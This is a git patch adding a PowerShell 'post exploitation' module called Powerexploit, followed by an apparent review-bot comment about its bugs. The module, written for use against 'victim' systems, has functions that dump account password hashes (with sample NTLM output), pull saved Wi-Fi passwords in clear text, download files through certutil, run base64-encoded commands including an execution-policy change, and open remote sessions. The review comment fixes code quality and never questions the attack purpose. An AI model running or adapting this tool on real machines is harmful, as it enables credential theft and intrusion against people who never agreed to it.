From af6272fda3614c7de05ef5412e5e031262b4e355 Mon Sep 17 00:00:00 2001
From: Ankit Dobhal
Date: Thu, 27 Feb 2020 14:09:46 +0530
Subject: [PATCH] Added Powerexploit module
---
PostExploitation/Powerexploit.psm1 | 465 +++++++++++++++++++++++++++++
1 file changed, 465 insertions(+)
create mode 100644 PostExploitation/Powerexploit.psm1
diff --git a/PostExploitation/Powerexploit.psm1 b/PostExploitation/Powerexploit.psm1
new file mode 100644
index 0000000..ef5ea3d
--- /dev/null
+++ b/PostExploitation/Powerexploit.psm1
@@ -0,0 +1,465 @@
+<#
+__________ .__ .__ __
+\______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ .Synopsis
+ Powerexploit is a pentesting tool contains scanning,remoting,post exploitation functionality.
+ #>
+
+
+ <#
+ .Synopsis
+ Invoke-login is an remote session function.
+ .DESCRIPTION
+ Invoke-login is a remote access function will help the attacker to remotely login inside the victim system.
+ .EXAMPLE
+ PS > Invoke-login laptop-ame0s3jl(computername) Elliot(username)
+ exploit the remote system
+ [laptop-ame0s3jl]: PS C:\Users\Elliot\Documents>
+ #>
+ function start-login {
+ param ([string]$computername,[string]$credntial)
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ Write-Host -fore green "exploiting the remote system"
+ Enter-PSSession -ComputerName $computername -Credential $credntial
+ }
+ }
+<#
+ .Synopsis
+ Get-data is a used for information gathering about victim system.
+ .DESCRIPTION
+ Get-data is a information gathering function in powerexploit module.
+ .EXAMPLE
+ PS > Get-data
+ The victim is running on kernal 10.0.17763 With the username Elliot & Computername is laptop-ame0s3jl\Elliot .
+ #>
+ function Get-data {
+ param ()
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ $wmiobject = get-wmiobject -class win32_operatingsystem
+ $user = ($wmiobject).RegisteredUser
+ $kernal_version = ($wmiobject).Version
+ Write-host -fore green "The victim is running on kernal $kernal_version ","With the username $user & Computername is $(whoami) ."
+}
+}
+<#
+ .Synopsis
+ Get-dumphash is a hash dumping function inspired by posh-secmod module in powershell.
+ .DESCRIPTION
+ Get-dumphash function will help attacker to dump the hashes of victim login accounts.
+ .EXAMPLE
+ PS> Get-dumphash
+[i] Dumping the hashes....
+Administrator:500:d5d443c4c0b122cadd2c0598372715bc:6b1d6f8554f3f1240429a7b977cfoe23:::
+Guest:501:71b02b342cee140bf9aea3a327bed57a:c1182d44aa3b20aa7e8879e4363a0c19:::
+DefaultAccount:503:32f72b29dbc61355e2307b9d4eac1274:1ab057794bbbd58997aac74de499d0bb:::
+WDAGUtilityAccount:504:7abecb7dcbf7938227b1ebd5c218c3db:6a46a24948de610e96faf4367d80101c:::
+Elliot:1001:4ac1c641591b70c93571344bb13bf229:8b0c165f0e63a09d9b68bc704ef4f8ec:::
+ #>
+ function Get-dumphash {
+ param ()
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ $enc = Get-PostHashdumpScript
+ $dump = powershell.exe -command $enc
+ write-host -fore green "[i] Dumping the hashes...."
+ Write-Output $dump
+ }
+ }
+<#
+ .Synopsis
+ Invoke-lmap is network mapper for powershell.
+ .DESCRIPTION
+ Invoke-lmap is automated function for psnmap powershell linux build network mapper.
+ .EXAMPLE
+ PS> invoke-lmap 192.168.0.1 80
+ (ip) (port)
+ #>
+ function Invoke-lmap {
+ param ($ip,[int]$port)
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ $scan = Invoke-PSnmap -Cn $ip -Port $port -Dns
+ Write-Host -fore green "[i] Scanning the IP $ Port with Dnslookup..."
+ Write-host -fore blue $scan
+ }
+ }
+
+ <#
+ .Synopsis
+ start-Arjun is a port scanner function inspired by @arjunkathait which lets you to scan ip with specific ports.
+ .DESCRIPTION
+ Start-Arjun port scanner function will help you scan the network with specific port number much faster than nmap.
+ .EXAMPLE
+ PS> start-arjun 192.168.0.1 80
+ (ip) (port)
+ #>
+ function Start-Arjun {
+ param ($ip,[int]$port)
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ $scan = test-netconnection -computername $ip -port $port -InformationLevel "Detailed"
+ $tcp = ($scan).TcpTestSucceeded
+ if ($tcp -eq "True")
+ {
+ Write-Host -fore green "Port $port is open!"
+ }
+ else {
+ Write-Host -fore green "Port $port is closed!"
+ }
+}
+}
+ <#
+ .Synopsis
+ start-Infoga is a function which will help you to find information about the victim system.
+ .DESCRIPTION
+ start-infoga is a combination of some cmdlets & functions in powershell version 5.1.
+ .EXAMPLE
+ PS> start-infoga
+ [i] Victim is running on Microsoft Windows 10 Home Single Language & version 10.0.17763..
+[i] victim computername is LAPTOP-AME0S3JL & computer model is Lenevo Laptop 15-da0xxx..
+[i] victim system root is C:\windows..
+[i] Victim current username is LAPTOP-AME0S3JL\Elliot..
+[i] victim admin password status is Disabled..
+ #>
+ function Start-Infoga {
+ param ()
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ $pc = Get-ComputerInfo
+ Write-host -fore green "[i] Victim is running on $(($pc).osname) & version $(($pc).OsVersion).."
+ Write-host -fore cyan "[i] victim computername is $(($pc).CsName) & computer model is $(($pc).CsModel).."
+ Write-host -fore blue "[i] victim system root is $(($pc).WindowsSystemRoot).."
+ Write-host -fore red "[i] Victim current username is $(($pc).CsUserName).."
+ Write-host -fore magenta "[i] victim admin password status is $(($pc).CsAdminPasswordStatus).."
+}
+}
+<#
+ .Synopsis
+ get-whois is a function which will help you to loopkup the address & ip.
+ .DESCRIPTION
+ get-whois will lookup the url & ip address.
+ .EXAMPLE
+ PS> get-whois google.com
+ #>
+function Get-Whois
+{
+ Param($Domain)
+
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ if ($Domain)
+ {
+ [WebTools.Whois]::lookup($Domain, [WebTools.Whois+RecordType]::domain)
+ }
+ }
+}
+
+<#
+ .Synopsis
+ Start-Encodedcommand is a post exploitation function .
+ .DESCRIPTION
+ Start-Encodedcommand function will help the attacker to generate important encoded commands inside the victim system.
+ .EXAMPLE
+ PS> Start-Encodedcommand
+
+__________ .__ .__ __
+\______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+
+[i] Generating encoded commands in victim system.....
+=====================================================
+Base64 Encoded command : RwBlAHQALQBOAGUAdABJAFAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgA=
+[i] Now launching encodedcommand in victim system.....
+=====================================================
+
+
+InterfaceAlias : Npcap Loopback Adapter
+InterfaceIndex : 16
+InterfaceDescription : Npcap Loopback Adapter
+IPv4Address : 169.254.177.174
+IPv6DefaultGateway :
+IPv4DefaultGateway :
+DNSServer : fec0:0:0:ffff::1
+ fec0:0:0:ffff::2
+ fec0:0:0:ffff::3
+ #>
+ function Start-Encodedcommand
+ {
+ Param()
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+
+ $commands = @('Get-NetIPConfiguration','Get-ComputerInfo','Get-Date','Get-HotFix','powershell.exe -command {set-executionpolicy remotesigned}','getmac')
+ Write-Host -fore yellow "[i] Generating encoded commands in victim system....."
+
+ for ($i = 0; $i -lt $commands.Count; $i++)
+ {
+ $bytes = [System.Text.Encoding]::Unicode.GetBytes($commands[$i])
+ $encodedCommand = [Convert]::ToBase64String($bytes)
+ Write-Host -fore red "====================================================="
+ Write-host -fore green "Base64 Encoded command : $encodedCommand"
+ Write-host -fore green "[i] Now launching encodedcommand in victim system....."
+ Write-Host -fore red "====================================================="
+ $launch = powershell.exe -encodedcommand $encodedCommand
+ Write-host -fore blue $launch
+ }
+ }
+ }
+
+ <#
+ .Synopsis
+ start-encodefile is a function used to encode & decode the files.
+ .DESCRIPTION
+ .EXAMPLE
+ PS >
+ #>
+ function Start-ToEncodefile {
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ Write-host -fore green "1. Encoding the victim files"
+ Write-host -fore magenta "2. Decoding the victim files"
+ $enter = Read-Host "What option you want? "
+ if ($enter -eq 1 )
+ {
+ $file = Read-Host "Enter the name of file for encoding "
+ $file2 = Read-Host "Enter the name of new file contains cipher text "
+ $encode = certutil.exe -encode $file $file2
+ Write-host -fore blue $encode
+ Write-host -fore green $(cat.exe $file2)
+ }
+ else {
+ $file_new = Read-Host "Enter the name of file for decoding "
+ $file2_new = Read-Host "Enter the name of new file contains plain text file "
+ $decode = certutil.exe -decode $file_new $file2_new
+ Write-host -fore blue $decode
+ Write-host -fore green $(cat.exe $file2_new)
+ }
+ }
+}
+
+<#
+ .Synopsis
+ Invoke-downloader is little brother of wget.
+ .DESCRIPTION
+ .EXAMPLE
+ PS >
+ #>
+ function Invoke-Downloader
+ {
+ Param($url)
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ Write-Host -fore green "psf> Downloading the file..."
+ $download = certutil.exe -verifyCTL -split -f $url
+ Write-host -fore blue $download
+ }
+ }
+
+<#
+ .Synopsis
+ Invoke-Filehash is hashing function will help you to find out hashing algorithm(sha1,sha,md5) & their hashes.
+ .DESCRIPTION
+ .EXAMPLE
+ PS >
+ #>
+ function Get-hash
+ {
+ Param($file)
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ Write-Host -fore Yellow "psf> Generating the file hash with algorithms..."
+ $gen = Get-FileHash $file
+ Write-host -fore green "psf> [i0] Algorithm : $(($gen).Algorithm)"
+ Write-host -fore blue "psf> [i0] Hash : $(($gen).Hash)"
+ }
+ }
+
+ <#
+ #>
+ function Get-WirelessInfo {
+ Process
+ {
+ $new = @(
+ "
+ __________ .__ .__ __
+ \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_
+ | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\
+ | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || |
+ |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__|
+ \/ \/ \/|__|
+ " )
+
+ Write-Host -fore green $new
+ Write-host -fore green "psf> [i] Victim Wi-fi Drivers information.........."
+ $driver = netsh.exe wlan show drivers
+ Write-output $driver
+ Write-host -fore green "psf> [i] Victim Wi-fi networks information.........."
+ $wlan = netsh.exe wlan SHOW NETWORKS MODE=BSSID
+ Write-output $wlan
+ Write-host -fore green "psf> [i] Victim Wi-fi all networks.........."
+ $networks = netsh.exe wlan show profile
+ Write-Output $networks
+ $ssid = Read-Host "Enter the ssid number shown above "
+ if ($ssid) {
+ $ssid_no = netsh.exe wlan show profile $ssid key=clear
+ Write-Output $ssid_no
+ }
+ else {
+ Write-host -fore yellow "psf> Not defined"
+ }
+ }
+
+ }
+ <#
+ .Synopsis
+ .DESCRIPTION
+ .EXAMPLE
+ PS >
+ #>
+ function Get-website
+ {
+ Param($site)
+ Process
+ {
+ $webRequest = [net.WebRequest]::Create($site)
+ $web = New-Object System.Net.WebClient
+ Try {
+ (($webRequest.GetResponse()).Statuscode) -as [int]
+ $crawl = $web.DownloadString($site)
+ Write-Host -fore Blue $crawl
+ }
+ Catch {
+ Write-host -fore Red -nonewline "Access down..."
+ }
+ }
+ }
\ No newline at end of file
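Review bot: Get-dumphash, Invoke-lmap and Get-Whois depend on `Get-PostHashdumpScript`, `Invoke-PSnmap` and the `[WebTools.Whois]` type, none of which this module defines, imports or loads with `Add-Type`, so each of those functions fails with a command-not-found or type-not-found error unless the caller has already loaded the right module; a `#Requires -Modules` line or an explicit `Import-Module` at the top of the file would make that dependency visible. In Invoke-lmap the message `"[i] Scanning the IP $ Port with Dnslookup..."` never shows the target because a bare `$` is not expanded, and it is written only after the scan has finished; `"[i] Scanning the IP $ip Port $port with Dnslookup..."` placed before the `Invoke-PSnmap` call is what was intended. In Start-Arjun, `if ($tcp -eq "True")` compares a [bool] with a string and only works because any non-empty string coerces to $true; `if ($tcp)` states the intent. In Get-website the WebResponse and WebClient are never disposed and the Catch discards `$_`, so a DNS failure, a TLS error and a 404 all print the same "Access down..."; disposing the response in a finally block and logging `$_.Exception.Message` would make failures diagnosable. Get-hash calls `Get-FileHash $file` without `-Algorithm`, which hashes with SHA256 only, whereas the synopsis promises sha1/md5 output.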